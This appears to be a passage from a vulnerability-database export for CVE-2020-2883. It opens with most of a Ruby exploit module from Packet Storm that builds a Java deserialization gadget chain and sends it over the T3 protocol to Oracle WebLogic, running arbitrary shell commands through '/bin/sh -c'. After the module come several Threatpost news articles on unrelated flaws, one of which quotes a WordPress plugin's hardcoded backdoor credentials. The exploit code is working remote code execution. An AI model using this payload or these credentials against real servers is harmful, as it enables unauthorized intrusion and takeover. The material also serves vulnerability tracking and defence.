[Lcom.tangosol.util.ValueExtractor; \npayload_obj << '56616c7565457874726163746f723b' \npayload_obj << '2246204735c4a0fe' # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7870' \npayload_obj << '00000003' \npayload_obj << '7372' \npayload_obj << '002f' # Class name length: 47 \npayload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor \npayload_obj << '74726163746f722e5265666c656374696f6e4578' \npayload_obj << '74726163746f72' \npayload_obj << reflection_extractor_uid # SerialVersionUID \npayload_obj << '02000' # Serializable \npayload_obj << reflect_extract_count \npayload_obj << '5b0009' # array, length: 9 \npayload_obj << '6d5f616f506172616d' # m_aoParam \npayload_obj << '740013' # String, length: 19 \npayload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object; \npayload_obj << add_sect \npayload_obj << '4c0009' # Object, length: 9 \npayload_obj << '6d5f734d6574686f64' # m_sMethod \npayload_obj << '740012' # String, length: 18 \npayload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String; \npayload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE \npayload_obj << '007e0009' # handle \npayload_obj << '00000000' \npayload_obj << '7572' \npayload_obj << '0013' # Class name length: 19 \npayload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object; \npayload_obj << '90ce589f1073296c' # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7870' \npayload_obj << '00000002' \npayload_obj << '74000a' # String, length: 10 \npayload_obj << '67657452756e74696d65' # getRuntime \npayload_obj << '7572' # TC_ARRAY, TC_CLASSDESC \npayload_obj << '0012' # Class name length: 18 \npayload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class; \npayload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID \npayload_obj << '020000' # Serializable, no fields \npayload_obj << '7870' \npayload_obj << '00000000' \npayload_obj << add_tc_null \npayload_obj << '740009' # String, length: 9 \npayload_obj << '6765744d6574686f64' # getMethod \npayload_obj << '7371' \npayload_obj << '007e000d' # handle \npayload_obj << '00000000' \npayload_obj << '7571' \npayload_obj << (change_handle? ? '007e0012' : '007e0011') # handle \npayload_obj << '00000002' \npayload_obj << '707571' \npayload_obj << (change_handle? ? '007e0012' : '007e0011') # handle \npayload_obj << '00000000' \npayload_obj << add_tc_null \npayload_obj << '740006' # String, length: 6 \npayload_obj << '696e766f6b65' # invoke \npayload_obj << '7371' \npayload_obj << '007e000d' # handle \npayload_obj << '00000000' \npayload_obj << '7571' \npayload_obj << (change_handle? ? '007e0012' : '007e0011') # handle \npayload_obj << '00000001' \npayload_obj << '7572' # TC_ARRAY, TC_CLASSDESC \npayload_obj << '0013' # Class name length: 19 \npayload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String; \npayload_obj << 'add256e7e91d7b47' # SerialVersionUID \npayload_obj << '020000' \npayload_obj << '7870' \npayload_obj << '00000003' \n \npayload_bin = format_payload(payload_data) \npayload_obj << payload_bin \n \npayload_obj << add_tc_null \npayload_obj << '740004' \npayload_obj << '65786563' # exec \npayload_obj << '7704' \npayload_obj << '00000003' \npayload_obj << '76720011' \npayload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime \npayload_obj << '0000000000000000000000' \npayload_obj << '7870' \npayload_obj << '740001' \npayload_obj << '3178' \nend \n \ndef extractor_comp_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'c7ad6d3a676f3c18' \nwhen Gem::Version.new('12.2.1.3.0') \n'fb4ac83df1d72edc' \nelse \n'f9b3bc58cc52cd21' \nend \nend \n \ndef change_handle? \n@version_no == Gem::Version.new('12.2.1.3.0') \nend \n \ndef chained_extractor_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'889f81b0945d5b7f' \nwhen Gem::Version.new('12.2.1.3.0') \n'06ee10433a4cc4b4' \nelse \n'435b250b72f63db5' \nend \nend \n \ndef abstract_extractor_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'658195303e723821' \nwhen Gem::Version.new('12.2.1.3.0') \n'752289ad4d460138' \nelse \n'9b1be18ed70100e5' \nend \nend \n \ndef reflection_extractor_uid \ncase @version_no \nwhen Gem::Version.new('12.1.3.0.0') \n'ee7ae995c02fb4a2' \nwhen Gem::Version.new('12.2.1.3.0') \n'87973791b26429dd' \nelse \n'1f62f564b951b614' \nend \nend \n \ndef reflect_extract_count \ncase @version_no \nwhen Gem::Version.new('12.2.1.3.0') \n'3' \nelse \n'2' \nend \nend \n \ndef add_sect \nsect = '' \n \nif @version_no == Gem::Version.new('12.2.1.3.0') \nsect << '4c0011' # Object, length: 17 \nsect << '6d5f657874726163746f' # m_extractorCached \nsect << '72436163686564' \nsect << '740012' \nsect << '4c6a6176612f6c616e67' # Ljava/lang/Object; \nsect << '2f4f626a6563743b' \nend \n \nsect \nend \n \ndef add_tc_null \nreturn '70' if @version_no == Gem::Version.new('12.2.1.3.0') \n \n'' \nend \n \ndef t3_send(payload_obj) \nprint_status('Sending object...') \n \nrequest_obj = '000009f3' # Original packet length \nrequest_obj << '016501' # CMD_IDENTIFY_REQUEST, flags \nrequest_obj << 'ffffffffffffffff' \nrequest_obj << '00000071' \nrequest_obj << '0000ea60' \nrequest_obj << '00000018432ec6' \nrequest_obj << 'a2a63985b5af7d63e643' \nrequest_obj << '83f42a6d92c9e9af0f94' \nrequest_obj << '72027973720078720178' \nrequest_obj << '720278700000000c0000' \nrequest_obj << '00020000000000000000' \nrequest_obj << '00000001007070707070' \nrequest_obj << '700000000c0000000200' \nrequest_obj << '00000000000000000000' \nrequest_obj << '01007006' \nrequest_obj << 'fe010000' # separator \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '001d' # Class name length: 29 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry \nrequest_obj << '6a766d2e436c61737354' \nrequest_obj << '61626c65456e747279' \nrequest_obj << '2f52658157f4f9ed' # SerialVersionUID \nrequest_obj << '0c0000' # flags? \nrequest_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC \nrequest_obj << '0024' # Class name length: 36 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5061636b61' \nrequest_obj << '6765496e666f' \nrequest_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID \nrequest_obj << '020009' # Serializable, 9 fields \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d616a6f72' # major \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d696e6f72' # minor \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '70617463685570646174' # patchUpdate \nrequest_obj << '65' \nrequest_obj << '49000c' # Field type: Int, field name length: 12 \nrequest_obj << '726f6c6c696e67506174' # rollingPatch \nrequest_obj << '6368' \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '73657276696365506163' # servicePack \nrequest_obj << '6b' \nrequest_obj << '5a000e' # Field type: Z = Bool, field name length: 14 \nrequest_obj << '74656d706f7261727950' # temporaryPatch \nrequest_obj << '61746368' \nrequest_obj << '4c0009' # Field type: Object, field name length: 9 \nrequest_obj << '696d706c5469746c65' # implTitle \nrequest_obj << '740012' # String, length: 18 \nrequest_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; \nrequest_obj << '2f537472696e673b' \nrequest_obj << '4c000a' # Field type: Object, field name length: 10 \nrequest_obj << '696d706c56656e646f72' # implVendor \nrequest_obj << '71007e0003' # TC_REFERENCE, handle \nrequest_obj << '4c000b' # Field type: Object, field name length: 11 \nrequest_obj << '696d706c56657273696f6e' # implVersion \nrequest_obj << '71007e0003' # TC_REFERENCE, handle \nrequest_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL \nrequest_obj << '7702' # TC_ENDBLOCKDATA \nrequest_obj << '000078' \nrequest_obj << 'fe010000' # separator \n \nrequest_obj << payload_obj \n \nrequest_obj << 'fe010000' # separator \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '001d' # Class name length: 29 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry \nrequest_obj << '6a766d2e436c61737354' \nrequest_obj << '61626c65456e747279' \nrequest_obj << '2f52658157f4f9ed' # SerialVersionUID \nrequest_obj << '0c0000' \nrequest_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC \nrequest_obj << '0021' # Class name length: 33 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5065657249' \nrequest_obj << '6e666f' \nrequest_obj << '585474f39bc908f1' # SerialVersionUID \nrequest_obj << '020007' # Serializable, 7 fields \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d616a6f72' # major \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d696e6f72' # minor \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '70617463685570646174' # patchUpdate \nrequest_obj << '65' \nrequest_obj << '49000c' # Field type: Int, field name length: 12 \nrequest_obj << '726f6c6c696e67506174' # rollingPatch \nrequest_obj << '6368' \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '73657276696365506163' # servicePack \nrequest_obj << '6b' \nrequest_obj << '5a000e' # Field type: Z = Bool, field name length: 14 \nrequest_obj << '74656d706f7261727950' # temporaryPatch \nrequest_obj << '61746368' \nrequest_obj << '5b0008' # Field type: Array, field name length: 8 \nrequest_obj << '7061636b61676573' # packages \nrequest_obj << '740027' # String, length: 39 \nrequest_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo; \nrequest_obj << '2f636f6d6d6f6e2f696e' \nrequest_obj << '7465726e616c2f506163' \nrequest_obj << '6b616765496e666f3b' \nrequest_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \nrequest_obj << '0024' # Class name length: 36 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5665727369' \nrequest_obj << '6f6e496e666f' \nrequest_obj << '972245516452463e' # SerialVersionUID \nrequest_obj << '020003' # Serializable, 3 fields \nrequest_obj << '5b0008' # Field type: Array, field name length: 8 \nrequest_obj << '7061636b61676573' # packages \nrequest_obj << '71007e0003' # TC_REFERENCE, handle \nrequest_obj << '4c000e' # Field type: Object, field name length: 14 \nrequest_obj << '72656c65617365566572' # releaseVersion \nrequest_obj << '73696f6e' \nrequest_obj << '740012' # String, length: 18 \nrequest_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; \nrequest_obj << '2f537472696e673b' \nrequest_obj << '5b0012' # Field type: Array, field name length: 18 \nrequest_obj << '76657273696f6e496e66' # versionInfoAsBytes \nrequest_obj << '6f41734279746573' \nrequest_obj << '740002' # String, length: 2 \nrequest_obj << '5b42' # [B \nrequest_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC \nrequest_obj << '0024' # Class name length: 36 \nrequest_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo \nrequest_obj << '6f6d6d6f6e2e696e7465' \nrequest_obj << '726e616c2e5061636b61' \nrequest_obj << '6765496e666f' \nrequest_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID \nrequest_obj << '020009' # Serializable, 9 fields \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d616a6f72' # major \nrequest_obj << '490005' # Field type: Int, field name length: 5 \nrequest_obj << '6d696e6f72' # minor \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '70617463685570646174' # patchUpdate \nrequest_obj << '65' \nrequest_obj << '49000c' # Field type: Int, field name length: 12 \nrequest_obj << '726f6c6c696e67506174' # rollingPatch \nrequest_obj << '6368' \nrequest_obj << '49000b' # Field type: Int, field name length: 11 \nrequest_obj << '73657276696365506163' # servicePack \nrequest_obj << '6b' \nrequest_obj << '5a000e' # Field type: Z = Bool, field name length: 14 \nrequest_obj << '74656d706f7261727950' # temporaryPatch \nrequest_obj << '61746368' \nrequest_obj << '4c0009' # Field type: Object, field name length: 9 \nrequest_obj << '696d706c5469746c65' # implTitle \nrequest_obj << '71007e0005' # TC_REFERENCE, handle \nrequest_obj << '4c000a' # Field type: Object, field name length: 10 \nrequest_obj << '696d706c56656e646f72' # implVendor \nrequest_obj << '71007e0005' # TC_REFERENCE, handle \nrequest_obj << '4c000b' # Field type: Object, field name length: 11 \nrequest_obj << '696d706c56657273696f' # implVersion \nrequest_obj << '6e' \nrequest_obj << '71007e0005' # TC_REFERENCE, handle \nrequest_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL \nrequest_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA \nrequest_obj << 'fe00ff' # separator \nrequest_obj << 'fe010000' \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '0013' # Class name length: 19 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID \nrequest_obj << '6a766d2e4a564d4944' \nrequest_obj << 'dc49c23ede121e2a' # SerialVersionUID \nrequest_obj << '0c0000' \nrequest_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA \nrequest_obj << '4621' \nrequest_obj << '000000000000000000' \nrequest_obj << '09' # length: 9 \nrequest_obj << '3132372e302e312e31' # 127.0.1.1 \nrequest_obj << '000b' # length: 11 \nrequest_obj << '75732d6c2d627265656e' # us-l-breens \nrequest_obj << '73' \nrequest_obj << 'a53caff10000000700' \nrequest_obj << '001b59' \nrequest_obj << 'ffffffffffffffffffff' \nrequest_obj << 'ffffffffffffffffffff' \nrequest_obj << 'ffffffff' \nrequest_obj << '0078' \nrequest_obj << 'fe010000' # separator \nrequest_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION \nrequest_obj << '7372' # TC_OBJECT, TC_CLASSDESC \nrequest_obj << '0013' # Class name length: 19 \nrequest_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID \nrequest_obj << '6a766d2e4a564d4944' \nrequest_obj << 'dc49c23ede121e2a' # SerialVersionUID \nrequest_obj << '0c0000' \nrequest_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA \nrequest_obj << '1d0181401281' \nrequest_obj << '34bf427600093132372e' \nrequest_obj << '302e312e31a53caff1' \nrequest_obj << '000000000078' \n \nnew_len = (request_obj.length / 2).to_s(16).rjust(8, '0') \nrequest_obj[0, 8] = new_len \n \nsock.put([request_obj].pack('H*')) \nsleep(1) \nend \n \ndef format_payload(payload_cmd) \nprint_status('Formatting payload...') \npayload_arr = payload_cmd.split(' ', 3) \n \nformatted_payload = '' \npayload_arr.each do |part| \nformatted_payload << '74' # denotes a string \nformatted_payload << part.length.to_s(16).rjust(4, '0') \nformatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join \nend \n \nformatted_payload \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd.prepend('/bin/sh -c ') \ncmd = build_payload_obj(cmd) \n \nt3_send(cmd) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157950/weblogic_deserialize_badattr_extcomp.rb.txt"}], "threatpost": [{"lastseen": "2020-05-05T22:03:33", "description": "A WordPress plugin, Slick Popup, has a serious privilege escalation flaw \u2013 and it has yet to be patched.\n\nWordPress plugin Slick Popup, which has 7,000 active installs and provides a tool for displaying the Contact Form 7 as a popup on WordPress websites. However, researchers with Wordfence said that they found a privilege escalation flaw in all versions (up to 1.7.1) of the plugin.\n\n\u201cPer our disclosure policy, we allowed 30 days for resolution of this issue before releasing details to the public,\u201d researchers said in a [Tuesday post](<https://www.wordfence.com/blog/2019/05/privilege-escalation-flaw-present-in-slick-popup-plugin/?utm_source=list&utm_medium=email&utm_campaign=052819&_hsenc=p2ANqtz--58P4Eqw8GNjqJWFsGtKDBtU9ybVVHgKZmezHHjQYszDGSPXPVQHQVScYEoKQZkNDAl3ok7qrnPKTPKgC0lnS5W45ujMl7uiZuS-HJcYQdO6QfcqE&_hsmi=73121550>). Unfortunately, the deadline has passed without a satisfactory patch by the plugin\u2019s developers.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOm Ak Solutions, the developers behind Slick Popup (and several other plugins, including Contact Form 7 Spam Blocker, Floating Icons and more), [have removed the plugin](<https://wordpress.org/plugins/slick-popup/>) from the WordPress plugin repository while dealing with a fix. The developers did not respond to a request for comment from Threatpost on when specifically a patch would be released.\n\nThe flaw stems from two issues in a feature of the plugin that is meant to grant support access to its developers with one click on the dashboard.\n\nFirst, researchers said that the credentials in the administrative account are hardcoded \u2013 so a \u201cuser\u201d account can be simply created with the username \u201cslickpopupteam\u201d and password \u201cOmakPass13#\u201d.\n\n\u201cSince this is a known value in all cases, it\u2019s possible for malicious actors to assemble a list of sites making use of the plugin and occasionally test for the presence of this support user,\u201d researchers said. \u201cOnce logged in, they\u2019re free to create other backdoors independent of this user.\u201d\n\nThen, once a user has been added (regardless of their privilege level) the site doesn\u2019t check that they are an administrator \u2013 meaning that attackers with mere \u201csubscriber\u201d access to the site can create a user account and potentially log in as an admin.\n\nThe flaw was disclosed to the developer April 22, and on April 27, the developer acknowledged the issue and said a patch would be released. However, by the public disclosure deadline, a patch had not yet been released.\n\nLuckily, \u201cBecause of the relatively small userbase of the plugin, and the authentication necessary to exploit it, we do not anticipate widespread attack campaigns leveraging this vulnerability,\u201d researchers said.\n\n## WP Database Backup\n\nIn a separate advisory, Wordfence researchers on Tuesday warned that WordPress plugin WP Database Backup also has a vulnerability \u2013 only this flaw has been patched.\n\nWP Database Backup, which has been installed more than 70,000 times, is a WordPress plugin allowing users to create and restore database backups for their websites. However, researchers said in a [Tuesday post](<https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/?utm_source=list&utm_medium=email&utm_campaign=052819&_hsenc=p2ANqtz--58P4Eqw8GNjqJWFsGtKDBtU9ybVVHgKZmezHHjQYszDGSPXPVQHQVScYEoKQZkNDAl3ok7qrnPKTPKgC0lnS5W45ujMl7uiZuS-HJcYQdO6QfcqE&_hsmi=73121550>) that an \u201cunnamed security researcher\u201d had published a proof of concept exploit for an unpatched flaw in the plugin.\n\n\u201cThe vulnerability, which was irresponsibly disclosed to the public before attempting to notify the plugin\u2019s developers, was reported as a plugin configuration change flaw,\u201d said researchers with Wordfence on Tuesday. \u201cA proof of concept (PoC) exploit was provided which allowed unauthenticated attackers to modify the destination email address for database backups, potentially putting sensitive information in their hands.\u201d\n\nThe flaw was originally disclosed April 24, and a patch was released on April 30.\n\nResearchers said that they immediately notified the plugin\u2019s developer of the issue, and the flaws have been patched as of version 5.2 of WP Database Backup.\n\nThe flaw stems from the plugin\u2019s internal settings. In unpatched versions of WP Database Backup, an attacker is able to inject operating system commands arbitrarily, which are then executed when the plugin performs a database backup. Injected commands would persist until manually removed, executing each time a backup is run.\n\n\u201cIn today\u2019s post, we detailed a previously undisclosed OS command injection flaw present in the WP Database Backup plugin,\u201d researchers said. \u201cThis flaw has been patched as of version 5.2 and we recommend affected users ensure they\u2019ve updated to the latest available version.\u201d\n\n## Plugin Flaws Continue\n\nPlugin flaws continue to plague WordPress websites. According to a Imperva [report](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>), almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog.\n\nOther recent vulnerabilities found in WordPress plugins, including Social Warfare, [Yellow Pencil Visual Theme Customizer](<https://threatpost.com/wordpress-yellow-pencil-plugin-exploited/143729/>), and [Yuzo Related Posts](<https://threatpost.com/wordpress-urges-users-to-uninstall-yuzo-plugin-after-flaw-exploited/143710/>).\n\nMore recently, [security researchers](<https://threatpost.com/joomla-and-wordpress-malicious-redirect-code/145068/>) warned owners of Joomla and WordPress websites of a malicious redirect script that is pushing visitors to malicious websites.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "cvss3": {}, "published": "2019-05-29T16:01:38", "type": "threatpost", "title": "WordPress Plugin Has Unpatched Privilege Escalation Flaw, Warn Researchers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-2883"], "modified": "2019-05-29T16:01:38", "id": "THREATPOST:402DA10D86DE62C2A50D39DA993A9518", "href": "https://threatpost.com/wordpress-plugin-has-unpatched-privilege-escalation-flaw-warn-researchers/145150/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-05T22:03:29", "description": "Nvidia, which makes gaming-friendly graphics processing units (GPUs), has patched two high-severity flaws in its GeForce Experience software, which could allow denial of service, information disclosure and privilege escalation on impacted systems.\n\nGeForce Experience is software for gamers utilizing Nvidia\u2019s GTX graphics card, which keeps users\u2019 drivers up-to-date, automatically optimizes their game settings and more. All versions of GeForce Experience for Windows prior to 3.19 are impacted to the two serious flaws (CVE\u20112019\u20115678 and CVE\u20112019\u20115676).\n\n\u201cThis update addresses issues that may lead to information disclosure, escalation of privileges, denial of service, or code execution,\u201d Nvidia said in a [Thursday advisory](<https://nvidia.custhelp.com/app/answers/detail/a_id/4806>). \u201cTo protect your system, download and install this software update through the GeForce Experience Downloads page.\u201d\n\nThe first vulnerability, CVE\u20112019\u20115678, which has a score of 7.8 out of 10 on the CVSS scale (making it high-severity), stems from the Web Helper component in the Display Control Panel of GeForce Experience.\n\nThis component does not properly validate input, meaning that an attacker with local system access can craft potentially malicious input. The input could lead to code execution, denial of service or information disclosure. David Yesland with Rhino Security Labs was credited with finding the flaw \u2013 on Monday, [he posted an analysis of the vulnerability](<https://rhinosecuritylabs.com/application-security/nvidia-rce-cve-2019-5678/>).\n\n\u201cAs far as some more insight into this vulnerability, Nvidia describes this vulnerability as being something that only an attacker with local system access could exploit,\u201d Yesland told Threatpost in an email. \u201cBut as the blog post will show, we have come up with a proof of concept which shows this being exploited through a web browser. The fix for this issue by Nvidia only directly fixed the command injection flaw in the Web Helper but did not fix the fact that you can use our method through the browser to interact with the Web Helper service. So any other flaw found in the Web Helper service could still be exploited in the same way.\u201d\n\nThe second flaw, CVE\u20112019\u20115676, exists in the installer software of GeForce Experience, and enables privilege escalation through code execution. The attacker would need access on a local system, Nvidia said.\n\n\u201cNVIDIA GeForce Experience installer software contains a vulnerability in which it incorrectly loads Windows system DLLs without validating the path or signature (also known as a binary planting or DLL preloading attack),\u201d said Nvidia.\n\nThis flaw ranks 7.2 out of 10 on the CVSS scale, making it high severity.\n\nMultiple researchers were credited with reporting the issue, including: Kushal Arvind Shah of Fortinet\u2019s FortiGuard Labs; \u0141ukasz \u2018zaeek\u2019; Yasin Soliman; Marius Gabriel Mihai; and Stefan Kanthak.\n\nGeForce Experience also faced a [high-severity bug](<https://threatpost.com/nvidia-geforce-experience-bug/143196/>) in March that could lead to code execution or denial-of-service of products if exploited. Also earlier in March, Google issued [patches](<https://threatpost.com/google-patches-11-critical-bugs-in-march-android-security-bulletin/130273/>) for bugs in NVIDIA components used in Android handsets. Two information disclosure bugs, rated high severity, were also patched by NVIDIA.\n\nAnd, earlier this month, Nvidia patched [three vulnerabilities](<https://threatpost.com/nvidia-windows-gamers-gpu-flaws/144595/>) in its Windows GPU display driver that could have enabled information disclosure, denial of service and privilege escalation.\n", "cvss3": {}, "published": "2019-05-31T14:13:09", "type": "threatpost", "title": "Nvidia Fixes High-Severity Flaws in GeForce Experience for Gamers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-5678", "CVE-2020-2883"], "modified": "2019-05-31T14:13:09", "id": "THREATPOST:DE325815FFEDB9A94065913580514DE5", "href": "https://threatpost.com/nvidia-fixes-high-severity-flaws-in-geforce-experience-for-gamers/145222/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-05T22:03:23", "description": "An unpatched vulnerability in smart TVs would allow attackers on the same Wi-Fi network to hijack the TV set to broadcast their own content \u2013 including, potentially, fake emergency broadcast messages.\n\nDiscovered by security researcher Dhiraj Mishra, the flaw (CVE-2019-12477) is found in the SUPRA Smart Cloud TV brand, which is popular in Russia and Eastern Europe. The TVs are mainly sold via [ecommerce sites](<https://www.alibaba.com/showroom/supra-tv.html>), in Russia, China and the United Arab Emirates, according to an online search.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue lies in the `openLiveURL()` function, which the TV uses to fetch streaming content. However, it lacks authentication requirements or session management, according to Mishra. So, an attacker can trigger the vulnerability by send a specially crafted request to a static URL, which allows the adversary to inject a remote file.\n\nA proof-of-concept video shows the attack:\n\n\u201cI found this vulnerability initially by source-code review and then by crawling the application, and reading every request helped me to trigger this vulnerability,\u201d Mishra said in his[ writeup](<https://www.inputzero.io/2019/06/hacking-smart-tv.html>) on Monday. \u201cSupra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI.\u201d\n\nThe requirement for the attackers to have access to the home Wi-Fi network obviously mitigates the threat to a certain extent. However, the growing tide of internet of things bugs in routers can give attackers remote access to that network. For instance, two models of TP-Link\u2019s budget routers, models TP-Link WR940N and TL-WR941ND, [were recently found to be vulnerable](<https://threatpost.com/tp-link-routers-vulnerable-to-zero-day-buffer-overflow-attack/143575/>) to flaws that allow attackers to take control of both.\n\n\u201cIn the case of these routers, we found a zero-day in the router could allow malicious third parties to take control of the device from a remote location,\u201d wrote Grzegorz Wypych with IBM Research, in April.\n\nMeanwhile, the SUPRA vulnerability remains unpatched; Mishra said that he couldn\u2019t find a way to contact the vendor. Threatpost also attempted to uncover contact information for SUPRA with no success.\n\nSmart-TV hijacking is not unheard of; in January, hackers took advantage of vulnerable Chromecast and Google Home devices [to display messages](<https://threatpost.com/hackers-say-they-hijacked-google-smart-tvs-to-promote-pewdiepie/140507/>) on consumer TVs promoting well-known YouTube star PewDiePie.\n\nConsumer Reports in 2018 meanwhile [identified two smart TV models](<https://www.consumerreports.org/tvs/samsung-fixes-smart-tv-security-issue/>) from Samsung and TCL that included bugs that allowed an attacker to take control of targeted TVs. A hacker who exploited these vulnerability would be able to take control of the TV and change the channel, turn up the volume and play offensive YouTube videos from anywhere on the planet, the report stated.\n\nOther smart TV bugs have cropped up as well. Last fall for instance, security researchers revealed that [eight Sony Bravia smart TV models](<https://threatpost.com/sony-smart-tv-bug-allows-remote-access-root-privileges/138063/>) are vulnerable to bugs that could allow complete remote code-execution with root privilege. A compromised TV could be recruited into a botnet or be used as springboard for additional attacks against devices that shared the same network.\n\nAnd meanwhile, the impact of smart-TV vulnerabilities is growing as more of the sets are deployed.\n\n\u201c[Cybercriminals] increasingly target IoT devices, such as smart TVs, that include always-on connectivity and high-performance GPUs that can be hijacked for malicious purposes,\u201d Tony Loi, Fortinet researcher, explained when describing the Sony flaws.\n", "cvss3": {}, "published": "2019-06-03T16:11:13", "type": "threatpost", "title": "Smart-TV Bug Allows Rogue Broadcasts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-12477", "CVE-2020-2883"], "modified": "2019-06-03T16:11:13", "id": "THREATPOST:2F7D7339CEE076DFDEB67638B6861B63", "href": "https://threatpost.com/smart-tv-bug-rogue-broadcasts/145275/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-05T22:03:21", "description": "The local privilege-escalation (LPE) zero-day bug in Microsoft Task Scheduler, disclosed by SandboxEscaper on Twitter in late May by way of making public a fully functioning exploit, now has a micropatch.\n\nThe interim fix, from 0patch, was issued Tuesday to address [the vulnerability](<https://threatpost.com/windows-zero-day-lpe/144976/>). The bug would allow LPE via importing legacy tasks from other systems into the Task Scheduler utility.\n\nMitja Kolsek, co-founder of 0patch and CEO of Arcos Security, told Threatpost that the bug (which he dubbed \u201cBearLPE\u201d after SandboxEscaper\u2019s Polar Bear-related blog title) is in most ways is a typical LPE flaw; it allows a low-privileged user on the computer to arbitrarily modify any file, including system executables.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSince these are executed in high-privileged context, the attacker\u2019s code can get executed and, for instance, promote the attacker to local administrator or obtain covert persistence on the computer,\u201d said Kolsek.\n\nHowever, there\u2019s more to it than that. While successful exploitation requires that the attacker must know a valid username and password on the target computer (requiring some reconnaissance or a lucky guess of a Windows domain user\u2019s credentials), the attack gives an adversary access to highly privileged files that usually only SYSTEM and TrustedInstaller have ownership over. It could also realistically be chained with comparatively more common and cheap exploits for remote access, researchers told Threatpost \u2013 making it a potentially very dangerous flaw.\n\nThe micropatch addresses the issue by cutting off a remote procedure call (RPC) called \u201cSchRpcSetSecurity.\u201d The original 